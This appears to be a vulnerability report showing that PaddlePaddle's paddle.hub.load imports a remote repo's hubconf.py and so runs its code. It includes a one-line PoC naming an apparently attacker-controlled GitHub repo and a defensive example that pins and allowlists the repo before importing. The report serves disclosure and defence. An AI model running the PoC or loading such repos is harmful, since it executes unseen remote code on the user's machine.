When a user loads an external model with the paddle.hub.load function, the call chain load -> _import_module -> __import__ ultimately leads to RCE.

The load function: when a user calls load, it imports the hubconf module, so injecting malicious code into the hubconf.py file of the remote repository is enough to trigger RCE.

Source code:

```python
def load(
    repo_dir: str,
    model: str,
    source: _Source = 'github',
    force_reload: bool = False,
    **kwargs: Any,
) -> paddle.nn.Layer:
    # Codes .....
    if source in ('github', 'gitee'):
        repo_dir = _get_cache_or_reload(
            repo_dir, force_reload, True, source=source
        )
    # MODULE_HUBCONF: str = 'hubconf.py'
    hub_module = _import_module(MODULE_HUBCONF.split('.')[0], repo_dir)
```

_import_module:

```python
def _import_module(name, repo_dir):
    sys.path.insert(0, repo_dir)
    try:
        hub_module = __import__(name)
        sys.modules.pop(name)
    except ImportError:
        sys.path.remove(repo_dir)
        raise RuntimeError(
            'Please make sure config exists or repo error messages above fixed when importing'
        )
    sys.path.remove(repo_dir)
    return hub_module
```

PoC: when a user loads content from an untrusted external source, calling paddle.hub.load directly can result in a security vulnerability.

```python
# PoC
import paddle
paddle.hub.load('JIRUWOZHI/test_padd:main', model='MM', source='github')
```
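To make the defensive point concrete, the following is an added example (not Paddle's code and not part of this issue): it reproduces the sys.path + import pattern against a constructed hubconf.py, shows that module-level code runs the moment the module is imported, and contrasts it with a guarded loader that checks an operator allowlist and a pinned SHA-256 of hubconf.py before any import happens. The repo ids, the allowlist, the digest pinning and the EXECUTED marker file are all assumptions made for this example.

```python
import hashlib
import importlib
import os
import sys
import tempfile

# Constructed stand-in for a remote repo's hubconf.py. Its module-level statement runs
# at import time, which is the whole problem: whatever the repo author put there executes.
HUBCONF_SRC = (
    "import os\n"
    "open(os.path.join(os.path.dirname(__file__), 'EXECUTED'), 'w').close()\n"
    "def MM():\n"
    "    return 'model'\n"
)
# Hypothetical allowlist of repo:ref values an operator has vetted (not a Paddle setting).
TRUSTED_REPOS = {"trusted-org/trusted-repo:v1.0"}

def make_repo(src=HUBCONF_SRC):
    """Write the constructed hubconf.py into a fresh directory standing in for the clone."""
    repo_dir = tempfile.mkdtemp()
    with open(os.path.join(repo_dir, "hubconf.py"), "w") as f:
        f.write(src)
    return repo_dir

def hubconf_digest(repo_dir):
    with open(os.path.join(repo_dir, "hubconf.py"), "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def hubconf_executed(repo_dir):
    """True once the constructed hubconf.py has actually been imported (marker file exists)."""
    return os.path.exists(os.path.join(repo_dir, "EXECUTED"))

def import_hubconf(repo_dir):
    """Same shape as the unguarded _import_module: sys.path insert + import, so code runs."""
    sys.path.insert(0, repo_dir)
    importlib.invalidate_caches()
    try:
        module = importlib.import_module("hubconf")
        sys.modules.pop("hubconf", None)
    finally:
        sys.path.remove(repo_dir)
    return module

def guarded_hub_load(repo_dir, repo_id, expected_sha256):
    """Hardened variant: allowlist and pinned hubconf.py digest are checked BEFORE importing."""
    if repo_id not in TRUSTED_REPOS:
        return "denied: repo not in allowlist"
    if hubconf_digest(repo_dir) != expected_sha256:
        return "denied: hubconf.py digest mismatch"
    return "loaded " + import_hubconf(repo_dir).MM()
```

Both refusals happen before sys.path is touched, so a hubconf.py from an unvetted repo, or one whose content changed since it was pinned, never gets to execute.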
Additional Supplementary Information
No response